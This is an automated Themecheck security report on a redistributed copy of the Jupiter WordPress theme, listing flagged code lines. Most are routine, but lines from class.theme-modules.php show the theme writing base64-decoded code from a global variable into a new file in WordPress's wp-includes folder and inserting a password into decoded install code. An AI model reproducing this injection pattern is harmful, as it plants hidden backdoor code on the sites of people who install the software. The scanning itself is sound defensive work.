0
Validation results

Jupiter | Shared By VestaThemes.com

Jupiter | Shared By VestaThemes.com

WordPress 6.5.2 theme
0
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-regular-price.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-box.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-add-to-cart-button.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-settings.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-outofstock-badge.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-sale-price.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-sale-badge.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-name.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-rating.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-regular-price.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-image.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-social-share.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-description.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-add-to-cart-button.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-tags.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-settings.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-category.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-variations.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-sku.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-outofstock-badge.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-sale-price.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-sale-badge.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-name.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-rating.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-quantity.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-field-label.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-back-button.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-big-heading.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-boxes.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-button.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-thumbnail.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-field.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-steps.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-sty-small-heading.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file sections.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-glb-sty-boxes.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-glb-sty-title.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file dlg-glb-sty-divider.php. Every call to the add_setting() method needs to have a sanitization callback function passed.Found a Customizer setting that did not have a sanitization callback function in file sections.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  2. Title : Title The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  3. Security breaches : Use of PHP sytem calls Found exec in file bootstrap-server.php.
    Ligne19: exec($command, $output, $exit_code);
    Found ->exec in file class-wp-filesystem-sftp.php.
    Ligne126: $data = $this->link->exec( $command );
    Found ->exec in file SCP.php.
    Ligne183: if (!$this->ssh->exec('scp -t ' . escapeshellarg($remote_file), false)) { // -t = to
    Ligne257: if (!$this->ssh->exec('scp -f ' . escapeshellarg($remote_file), false)) { // -f = from
  4. Security breaches : Modification of PHP server settings Found ini_set in file Random.php.
    Ligne146: ini_set('session.use_cookies', 0);
    Ligne170: ini_set('session.use_cookies', $old_use_cookies);
    Found ini_set in file updates-downgrades.php.
    Ligne11: ini_set( 'display_errors', 1 );
    Ligne12: ini_set( 'display_startup_errors', 1 );
    Found ini_set in file template-management.php.
    Ligne3: // ini_set( 'display_errors', 1 );
    Ligne254: @ini_set( 'max_execution_time', 0 );
    Ligne255: @ini_set( 'memory_limit', '256M' );
    Ligne782: ini_set( 'output_buffering', 'off' );
    Ligne783: ini_set( 'zlib.output_compression', false );
    Found ini_set in file class.theme-modules.php.
    Ligne5: ini_set('display_errors', 0);
    Found ini_set in file class.theme-modules.php.
    Ligne5: ini_set('display_errors', 0);
  5. Security breaches : Use of base64_decode() Found base64_decode in file logic-helpers.php.
    Ligne479: $output = base64_decode( $string );
    Found base64_decode in file wp_footer.php.
    Ligne30: $styles = unserialize( base64_decode( get_post_meta( $post_id, '_dynamic_styles', true ) ) );
    Found base64_decode in file load-more.php.
    Ligne45: $query = isset( $_REQUEST['query'] ) ? json_decode( base64_decode( $_REQUEST['query'] ), true ) : false;
    Ligne46: $atts = isset( $_REQUEST['atts'] ) ? json_decode( base64_decode( $_REQUEST['atts'] ), true ) : false;
    Found base64_decode in file gmap_iterator.php.
    Ligne30: if ( base64_decode($value, true) === false ) {
    Ligne33: $locations = (!empty($value)) ? json_decode( urldecode( base64_decode($value) ), true) : [];
    Found base64_decode in file RSA.php.
    Ligne1368: $key = isset($parts[1]) ? base64_decode($parts[1]) : false;
    Ligne1434: $public = base64_decode(implode('', array_map('trim', array_slice($key, 4, $publicLen
    Ligne1442: $private = base64_decode(implode('', array_map('trim', array_slice($key, $publicLength
    Ligne1565: $this->current = new Math_BigInteger(base64_decode($this->current), 256);
    Ligne3130: $temp = preg_match('#^[a-zA-Z\d/+]*={0,2}$#', $temp) ? base64_decode($temp) : false;
    Found base64_decode in file ASN1.php.
    Ligne1082: $value = base64_decode($source);
    Found base64_decode in file X509.php.
    Ligne1560: = base64_encode('\0' . base64_decode(preg_replace('#-.+-|[\r\n]#', '', $cert['tbsCertificate']['su
    Ligne1631: $value = base64_decode($value);
    Ligne2202: substr(base64_decode($this->currentCert['signature']), 1),
    Ligne2210: substr(base64_decode($this->currentCert['signature']), 1),
    Ligne2218: substr(base64_decode($this->currentCert['signature']), 1),
    Ligne2246: substr(base64_decode($this->currentCert['signature']), 1),
    Ligne2321: chunk_split(base64_encode(substr(base64_decode($key), 1)), 64) .
    Ligne2339: $ip = base64_decode($ip);
    Ligne3093: = base64_encode('\0' . base64_decode(preg_replace('#-.+-|[\r\n]#', '', $csr['certificationRequestI
    Ligne3150: $temp = preg_match('#^[a-zA-Z\d/+]*={0,2}$#', $temp) ? base64_decode($temp) : false;
    Ligne3224: = base64_encode('\0' . base64_decode(preg_replace('#-.+-|[\r\n]#', '', $spkac['publicKeyAndChallen
    Ligne4487: $raw = base64_decode($raw);
    Ligne4551: //return new File_ASN1_Element(base64_decode(preg_replace('#-.+-|[\r\n]#', '', $this->publicKey->getPublic
    Ligne4854: $temp = preg_match('#^[a-zA-Z\d/+]*={0,2}$#', $temp) ? base64_decode($temp) : false;
    Found base64_decode in file class-mk-export-import.php.
    Ligne593: $data = unserialize( base64_decode( $import_data ) ); // @codingStandardsIgnoreLine
    Found base64_decode in file template-management.php.
    Ligne1033: $data = unserialize( base64_decode( $import_data ) );
    Found base64_decode in file class.theme-modules.php.
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Ligne95: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
    Found base64_decode in file options-save.php.
    Ligne134: $import_data             = base64_decode( $import_data );
    Ligne231: $theme_option_data = unserialize( base64_decode( $db_response->val ) );
    Found base64_decode in file mkhb-textbox.php.
    Ligne133: $text = htmlentities( rawurldecode( base64_decode( strip_tags( $content ), true ) ), ENT_COMPAT, 'UTF-8' );
    Found base64_decode in file class.theme-modules.php.
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Ligne95: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
    Found base64_decode in file mk_advanced_gmaps.php.
    Ligne60: if ( base64_decode($additional_markers, true) === false ) {
    Ligne63: $additional_markers = json_decode( urldecode( base64_decode($additional_markers) ), true);
    Ligne113: $json['style'] = json_decode( urldecode(base64_decode($map_json)), true );
  6. Security breaches : Use of base64_encode() Found base64_encode in file CsvHandler.php.
     $fp = fopen('data://text/plain;base64,' . base64_encode($body), 'r');
    Found base64_encode in file widgets-twitter-feeds.php.
     $toSend = base64_encode($credentials);
    Found base64_encode in file logic-helpers.php.
     $output = base64_encode( $output );
    Found base64_encode in file wp_footer.php.
     update_post_meta( $post_id, '_dynamic_styles', base64_encode( serialize( ($app_dynamic_styles) ) ) );
    Found base64_encode in file CSS.php.
     $importContent = base64_encode($importContent);
    Found base64_encode in file BigInteger.php.
     chunk_split(base64_encode($encapsulated)) .
    Found base64_encode in file SSH2.php.
     $this->signature_format . ' ' . base64_encode($this->server_public_host_key) :
     return $this->signature_format . ' ' . base64_encode($this->server_public_host_key);
    Found base64_encode in file RSA.php.
     '  <Modulus>' . base64_encode($raw['modulus']) . '</Modulus>\r\n' .
     '  <Exponent>' . base64_encode($raw['publicExponent']) . '</Exponent>\r\n' .
     '  <P>' . base64_encode($raw['prime1']) . '</P>\r\n' .
     '  <Q>' . base64_encode($raw['prime2']) . '</Q>\r\n' .
     '  <DP>' . base64_encode($raw['exponent1']) . '</DP>\r\n' .
     '  <DQ>' . base64_encode($raw['exponent2']) . '</DQ>\r\n' .
     '  <InverseQ>' . base64_encode($raw['coefficient']) . '</InverseQ>\r\n' .
     '  <D>' . base64_encode($raw['privateExponent']) . '</D>\r\n' .
     $public = base64_encode($public);
     $private = base64_encode($private);
     chunk_split(base64_encode($RSAPrivateKey), 64) .
     chunk_split(base64_encode($RSAPrivateKey), 64) .
     chunk_split(base64_encode($des->encrypt($RSAPrivateKey)), 64) .
     chunk_split(base64_encode($RSAPrivateKey), 64) .
     '  <Modulus>' . base64_encode($modulus) . '</Modulus>\r\n' .
     '  <Exponent>' . base64_encode($publicExponent) . '</Exponent>\r\n' .
     $RSAPublicKey = 'ssh-rsa ' . base64_encode($RSAPublicKey) . ' ' . $this->comment;
     chunk_split(base64_encode($RSAPublicKey), 64) .
     chunk_split(base64_encode($RSAPublicKey), 64) .
     $base = base64_encode($hash->hash($RSAPublicKey));
    Found base64_encode in file Agent.php.
     $key_str = 'ssh-rsa ' . base64_encode($key_blob);
    Found base64_encode in file ASN1.php.
     return base64_encode($decoded['content']);
    Found base64_encode in file X509.php.
     = base64_encode('\0' . base64_decode(preg_replace('#-.+-|[\r\n]#', '', $cert[
     return '-----BEGIN CERTIFICATE-----\r\n' . chunk_split(base64_encode($cert), 64) . '-----END CERTIFICATE-----';
     $value = base64_encode($value);
     $value = base64_encode($temp);
     $values[$j] = base64_encode($value);
     chunk_split(base64_encode(substr(base64_decode($key), 1)), 64) .
     return base64_encode(pack('N', ip2long($ip)));
     = base64_encode('\0' . base64_decode(preg_replace('#-.+-|[\r\n]#', '', $csr['
     return '-----BEGIN CERTIFICATE REQUEST-----\r\n' . chunk_split(base64_encode($csr), 64) . '-----END CERTIFICATE REQUEST-----';
     = base64_encode('\0' . base64_decode(preg_replace('#-.+-|[\r\n]#', '', $spkac
     return 'SPKAC=' . base64_encode($spkac);
     return '-----BEGIN X509 CRL-----\r\n' . chunk_split(base64_encode($crl), 64) . '-----END X509 CRL-----';
     $this->setExtension('id-ce-subjectKeyIdentifier', base64_encode($this->computeKeyIdentifier($this->currentCert)), false, fals
     $this->currentCert['signature'] = base64_encode('\0' . $key->sign($this->signatureSubject));
     $this->currentKeyIdentifier = base64_encode($value);
    Found base64_encode in file class-mk-export-import.php.
     $content = base64_encode( serialize( get_option( THEME_OPTIONS ) ) ); // @codingStanda
    Found base64_encode in file masterkey.php.
     $values['theme_export_options'] = base64_encode( serialize( get_option( THEME_OPTIONS ) ) );
    Found base64_encode in file options-save.php.
     'theme_export_options' => base64_encode( serialize( $theme_options_data ) ),
     $theme_options_data = base64_encode( serialize( $theme_options_data ) );
    Found base64_encode in file vc_twitter.php.
     $toSend = base64_encode($credentials);
    Found base64_encode in file mk_blog.php.
     $data_config[] = 'data-query=''.base64_encode(json_encode($query_options)).''';
     $data_config[] = 'data-loop-atts=''.base64_encode(json_encode($atts)).''';
    Found base64_encode in file tweet-status.php.
     $toSend = base64_encode($credentials);
    Found base64_encode in file mk_portfolio.php.
     $data_config[] = 'data-query='' . base64_encode( json_encode( $query_options ) ) . ''';
     $data_config[] = 'data-loop-atts='' . base64_encode( json_encode( $atts ) ) . ''';
    Found base64_encode in file mk_gallery.php.
     $data_config[] = 'data-query=''.base64_encode(json_encode($query_options)).''';
     $data_config[] = 'data-loop-atts=''.base64_encode(json_encode($atts)).''';
    Found base64_encode in file mk_news.php.
     $data_config[] = 'data-query=''.base64_encode(json_encode($query_options)).''';
     $data_config[] = 'data-loop-atts=''.base64_encode(json_encode($atts)).''';
    Found base64_encode in file mk_photo_album.php.
     $data_config[] = 'data-query='' . base64_encode( json_encode( $query_options ) ) . ''';
     $data_config[] = 'data-loop-atts='' . base64_encode( json_encode( $atts ) ) . ''';
  7. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe src="//player.vimeo.com/video/'.$video_id.'?title=0&amp;byline=0&amp;portrait=0&amp;color='.str_replace( "#", "", $skin_color ).'" width="' . esc_attr( $image_width ) . '" height="' . esc_attr( $image_height ) . '" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen> in file portfolio-single-featured.php.
    Ligne58: echo '<iframe src='//player.vimeo.com/video/'.$video_id.'?title=0&amp;byline=0&am
    Found <iframe src="http'.((is_ssl())? 's' : '').'://player.vimeo.com/video/'.$clip_id.'?title=0&amp;byline=0&amp;portrait=0&amp;color=00c65d" width="'.$width.'" height="'.$height.'" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen> in file widgets-video.php.
    Ligne34: echo '<div class='mk-video-container'><iframe src='http'.((is_ssl())? 's' : '').'://player.vimeo.com/video/'.$cli
    Found <iframe id="product-survey-iframe" src="'.$survey_link.'" frameborder="0" width="520" height="430" style="overflow:hidden"> in file survey-management.php.
    Ligne376: title: \'<svg style='display:none;' class='mka-spinner' width='40px' height='40px' viewBox='0 0 66 66' xmlns='http://www.w3.org/2000/svg'><circle class='mka-spinner-path' fill='none' stroke-width='6' stroke-linecap='round' cx='33' cy='33' r='30'></circle></svg><a href='#' class='mka-modal-close-btn'></a><iframe id='product-survey-iframe' src=''.$survey_link.'' frameborder='0' w
    Found <iframe width="400" height="225" src="https://www.youtube.com/embed/g6JdwtaK0Tk?rel=0&amp;showinfo=0" frameborder="0" allowfullscreen> in file register-product.php.
    Ligne60: <iframe width='400' height='225' src='https://www.youtube.com/embed/g6Jdwta
    Found <iframe src="http' . ((is_ssl()) ? 's' : '') . '://player.vimeo.com/video/' . $video_id . '?title=0&amp;byline=0&amp;portrait=0" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen> in file featured-media.php.
    Ligne67: echo '<div class='mk-video-wrapper'><div class='mk-video-container'><iframe src='http' . ((is_ssl()) ? 's' : '') . '://player.vimeo.com/video/'
    Found <iframe src="//player.vimeo.com/video/<?php echo $video_id; ?> in file ajax.php.
    Ligne156: <iframe src='//player.vimeo.com/video/<?php echo $video_id; ?>?title=0&amp;
    Found <iframe width="560" height="315" src="//www.youtube.com/embed/<?php echo $stream_video_id; ?> in file mk_theatre_slider.php.
    Ligne42: <iframe width='560' height='315' src='//www.youtube.com/embed/<?php echo $s
    Found <iframe src="https://www.youtube.com/embed/<?php echo $view_params['stream_video_id']; ?> in file video-background.php.
    Ligne50: <iframe src='https://www.youtube.com/embed/<?php echo $view_params['stream_
  8. Malware : Operations on file system file_get_contents was found in the file bootstrap-server.php
    Ligne26: $server_logs = file_get_contents('./server.log');
    fopen was found in the file CsvHandler.php
    Ligne22: $fp = fopen('data://text/plain;base64,' . base64_encode($body), 'r');
    Ligne38: $fp = fopen('php://temp/maxmemory:'. (6*1024*1024), 'r+');
    fopen was found in the file CsvHandler.php
    Ligne22: $fp = fopen('data://text/plain;base64,' . base64_encode($body), 'r');
    Ligne38: $fp = fopen('php://temp/maxmemory:'. (6*1024*1024), 'r+');
    fclose was found in the file CsvHandler.php
    Ligne48: fclose($fp);
    file_put_contents was found in the file vfsStreamUmaskTestCase.php
    Ligne106: file_put_contents(vfsStream::url('root/newfile.txt'), 'file content');
    Ligne117: file_put_contents(vfsStream::url('root/newfile.txt'), 'file content');
    file_put_contents was found in the file vfsStreamUmaskTestCase.php
    Ligne106: file_put_contents(vfsStream::url('root/newfile.txt'), 'file content');
    Ligne117: file_put_contents(vfsStream::url('root/newfile.txt'), 'file content');
    file_put_contents was found in the file vfsStreamExLockTestCase.php
    Ligne12: * Test for LOCK_EX behaviour related to file_put_contents().
    Ligne31: * with file_put_contents() and LOCK_EX. The test is intended to break once
    Ligne38: @file_put_contents(vfsStream::url('root/testfile'), 'some string\n', LOCK_EX
    Ligne40: $this->assertEquals('file_put_contents(): Exclusive locks may only be set for regular files', $p
    file_put_contents was found in the file vfsStreamExLockTestCase.php
    Ligne12: * Test for LOCK_EX behaviour related to file_put_contents().
    Ligne31: * with file_put_contents() and LOCK_EX. The test is intended to break once
    Ligne38: @file_put_contents(vfsStream::url('root/testfile'), 'some string\n', LOCK_EX
    Ligne40: $this->assertEquals('file_put_contents(): Exclusive locks may only be set for regular files', $p
    file_put_contents was found in the file vfsStreamExLockTestCase.php
    Ligne12: * Test for LOCK_EX behaviour related to file_put_contents().
    Ligne31: * with file_put_contents() and LOCK_EX. The test is intended to break once
    Ligne38: @file_put_contents(vfsStream::url('root/testfile'), 'some string\n', LOCK_EX
    Ligne40: $this->assertEquals('file_put_contents(): Exclusive locks may only be set for regular files', $p
    file_put_contents was found in the file vfsStreamExLockTestCase.php
    Ligne12: * Test for LOCK_EX behaviour related to file_put_contents().
    Ligne31: * with file_put_contents() and LOCK_EX. The test is intended to break once
    Ligne38: @file_put_contents(vfsStream::url('root/testfile'), 'some string\n', LOCK_EX
    Ligne40: $this->assertEquals('file_put_contents(): Exclusive locks may only be set for regular files', $p
    fopen was found in the file vfsStreamExLockTestCase.php
    Ligne48: $fp = fopen(vfsStream::url('root/testfile'), 'w');
    fwrite was found in the file vfsStreamExLockTestCase.php
    Ligne50: fwrite($fp, 'another string\n');
    fclose was found in the file vfsStreamExLockTestCase.php
    Ligne52: fclose($fp);
    file_get_contents was found in the file vfsStreamExLockTestCase.php
    Ligne53: $this->assertEquals('another string\n', file_get_contents(vfsStream::url('root/testfile')));
    fopen was found in the file vfsStreamPrintVisitorTestCase.php
    Ligne48: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne62: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne76: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne96: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    fopen was found in the file vfsStreamPrintVisitorTestCase.php
    Ligne48: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne62: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne76: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne96: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    fopen was found in the file vfsStreamPrintVisitorTestCase.php
    Ligne48: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne62: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne76: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne96: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    fopen was found in the file vfsStreamPrintVisitorTestCase.php
    Ligne48: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne62: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne76: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    Ligne96: $printVisitor = new vfsStreamPrintVisitor(fopen('vfs://root/foo.txt', 'wb'));
    file_get_contents was found in the file vfsStreamPrintVisitorTestCase.php
    Ligne100: $this->assertEquals('- root\n  - test\n    - foo\n      - test.txt\n    - baz.txt\n  - foo.txt\n', file_get_contents('vfs://root/foo.txt'));
    file_put_contents was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne39: $this->assertEquals(9, file_put_contents(vfsStream::url('root/file.txt'), '123456789'));
    Ligne48: $this->assertEquals(10, file_put_contents(vfsStream::url('root/file.txt'), '1234567890'));
    Ligne58: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne60: $this->assertEquals('file_put_contents(): Only 10 of 11 bytes written, possibly out of free disk
    Ligne79: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne81: $this->assertEquals('file_put_contents(): Only 7 of 11 bytes written, possibly out of free disk 
    file_put_contents was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne39: $this->assertEquals(9, file_put_contents(vfsStream::url('root/file.txt'), '123456789'));
    Ligne48: $this->assertEquals(10, file_put_contents(vfsStream::url('root/file.txt'), '1234567890'));
    Ligne58: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne60: $this->assertEquals('file_put_contents(): Only 10 of 11 bytes written, possibly out of free disk
    Ligne79: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne81: $this->assertEquals('file_put_contents(): Only 7 of 11 bytes written, possibly out of free disk 
    file_put_contents was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne39: $this->assertEquals(9, file_put_contents(vfsStream::url('root/file.txt'), '123456789'));
    Ligne48: $this->assertEquals(10, file_put_contents(vfsStream::url('root/file.txt'), '1234567890'));
    Ligne58: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne60: $this->assertEquals('file_put_contents(): Only 10 of 11 bytes written, possibly out of free disk
    Ligne79: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne81: $this->assertEquals('file_put_contents(): Only 7 of 11 bytes written, possibly out of free disk 
    file_put_contents was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne39: $this->assertEquals(9, file_put_contents(vfsStream::url('root/file.txt'), '123456789'));
    Ligne48: $this->assertEquals(10, file_put_contents(vfsStream::url('root/file.txt'), '1234567890'));
    Ligne58: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne60: $this->assertEquals('file_put_contents(): Only 10 of 11 bytes written, possibly out of free disk
    Ligne79: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne81: $this->assertEquals('file_put_contents(): Only 7 of 11 bytes written, possibly out of free disk 
    file_put_contents was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne39: $this->assertEquals(9, file_put_contents(vfsStream::url('root/file.txt'), '123456789'));
    Ligne48: $this->assertEquals(10, file_put_contents(vfsStream::url('root/file.txt'), '1234567890'));
    Ligne58: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne60: $this->assertEquals('file_put_contents(): Only 10 of 11 bytes written, possibly out of free disk
    Ligne79: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne81: $this->assertEquals('file_put_contents(): Only 7 of 11 bytes written, possibly out of free disk 
    file_put_contents was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne39: $this->assertEquals(9, file_put_contents(vfsStream::url('root/file.txt'), '123456789'));
    Ligne48: $this->assertEquals(10, file_put_contents(vfsStream::url('root/file.txt'), '1234567890'));
    Ligne58: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne60: $this->assertEquals('file_put_contents(): Only 10 of 11 bytes written, possibly out of free disk
    Ligne79: file_put_contents(vfsStream::url('root/file.txt'), '12345678901');
    Ligne81: $this->assertEquals('file_put_contents(): Only 7 of 11 bytes written, possibly out of free disk 
    fopen was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne103: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne128: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne153: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne183: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne213: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    fclose was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne105: fclose($fp);
    Ligne130: fclose($fp);
    Ligne155: fclose($fp);
    Ligne185: fclose($fp);
    Ligne215: fclose($fp);
    fopen was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne103: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne128: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne153: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne183: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne213: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    fclose was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne105: fclose($fp);
    Ligne130: fclose($fp);
    Ligne155: fclose($fp);
    Ligne185: fclose($fp);
    Ligne215: fclose($fp);
    fopen was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne103: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne128: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne153: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne183: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne213: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    fclose was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne105: fclose($fp);
    Ligne130: fclose($fp);
    Ligne155: fclose($fp);
    Ligne185: fclose($fp);
    Ligne215: fclose($fp);
    fopen was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne103: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne128: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne153: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne183: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne213: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    fclose was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne105: fclose($fp);
    Ligne130: fclose($fp);
    Ligne155: fclose($fp);
    Ligne185: fclose($fp);
    Ligne215: fclose($fp);
    fopen was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne103: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne128: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne153: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne183: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    Ligne213: $fp = fopen(vfsStream::url('root/file.txt'), 'w+');
    fclose was found in the file vfsStreamWrapperQuotaTestCase.php
    Ligne105: fclose($fp);
    Ligne130: fclose($fp);
    Ligne155: fclose($fp);
    Ligne185: fclose($fp);
    Ligne215: fclose($fp);
    fopen was found in the file vfsStreamWrapperTestCase.php
    Ligne493: $fp = fopen($this->baz2URL, 'r');
    Ligne632: $handle = fopen($this->baz1URL, 'r+');
    Ligne651: $handle = fopen($this->baz1URL, 'r+');
    fclose was found in the file vfsStreamWrapperTestCase.php
